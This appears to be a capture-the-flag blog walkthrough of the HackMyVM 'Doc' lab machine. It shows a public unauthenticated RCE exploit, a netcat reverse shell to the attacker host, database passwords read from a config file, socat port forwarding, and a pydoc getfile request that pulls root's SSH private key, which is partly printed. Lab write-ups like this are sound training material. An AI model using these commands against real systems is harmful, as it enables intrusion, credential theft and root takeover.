日度归档:2021 年 8 月 27 日

HackMyVm Doc Walkthrough

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bah.hmv (192.168.56.100)
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Check port 80, it's Online Traffic Offense Management System. Google the exploit, and add doc.hmv to /etc/hosts.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) 

Use the POC to get user shell.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Because this shell is not full functional, we spawn another reverse shell.

```bash
 $ nc 192.168.56.150 1234 -e /bin/bash
 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:44802.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella.

www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 <?php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");
 ?>

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$


Check local port, port 21 is actually ssh, so we portforword it outside.

 ```bash
bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
 LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
 LISTEN 0      128        127.0.0.1:21        0.0.0.0:*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 [1] 571

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
(ALL : ALL) NOPASSWD: /usr/bin/doc


Disassemble doc, we know it's actually pydoc3.9.

 ```bash
; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 nop
 pop     rbp
 retn
 ; } // starts at 1135
 main endp

Google exploit of pydoc.

https://bugs.python.org/issue42988

Start doc server.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit
 server>

In another term, we login ssh as user bella, and get the ssh key of root.

 ~ ssh bella@192.168.56.100 -p 5000      
 bella@192.168.56.100's password:
 ...
 Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
 ...
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
 qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
 LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
 ...
 s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
 uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
 -----END OPENSSH PRIVATE KEY-----

Login ssh as root.

 ~ ssh root@192.168.56.100 -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doc
 root@doc:~#